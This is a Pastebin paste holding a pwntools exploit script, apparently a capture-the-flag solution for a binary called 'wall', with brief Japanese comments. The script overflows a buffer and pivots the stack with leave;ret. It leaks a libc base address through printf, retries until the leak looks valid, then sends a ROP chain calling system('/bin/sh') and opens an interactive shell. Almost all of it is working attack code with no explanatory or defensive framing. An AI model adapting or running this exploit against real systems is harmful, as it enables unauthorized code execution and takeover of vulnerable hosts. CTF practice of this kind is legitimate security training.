Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # yaru
- # rbpとrspごにょってmessageにスタックうつしてrop
- from pwn import *
- elf = ELF("./wall")
- libc = ELF("./libc.so.6")
- while True:
- try:
- p = remote(arupaka)
- leave_ret = 0x401261
- pop_rbp_ret = 0x40115d
- call_printf_in_get_name = 0x401191
- payload = b'A'*(0x800+0x80)
- payload += p64(elf.sym.message + 0x800 - 8)
- payload += p64(leave_ret)
- p.sendline(payload)
- p.sendline((p64(elf.sym.message+0x800+0x80)+p64(call_printf_in_get_name))*8)
- p.recvline()
- libc.address = u64(p.recv(6, timeout=1).ljust(8, b'\0')) - 0x62050
- if libc.address & 0x7f0000000000 != 0x7f0000000000:
- p.close()
- continue
- print('libc_base:', hex(libc.address))
- pop_rdi = libc.address + 0x001bbea1
- binsh = next(libc.search(b'/bin/sh\0'))
- system = libc.sym.system
- rop = p64(pop_rdi)
- rop += p64(binsh)
- rop += p64(system)
- p.sendline(rop)
- p.recvline()
- p.sendline(b'echo asdf')
- if p.recvline() == b'asdf\n':
- p.interactive()
- break
- except KeyboardInterrupt:
- p.close()
- break
- except:
- p.close()
- continue
Advertisement
Add Comment
Please, Sign In to add comment
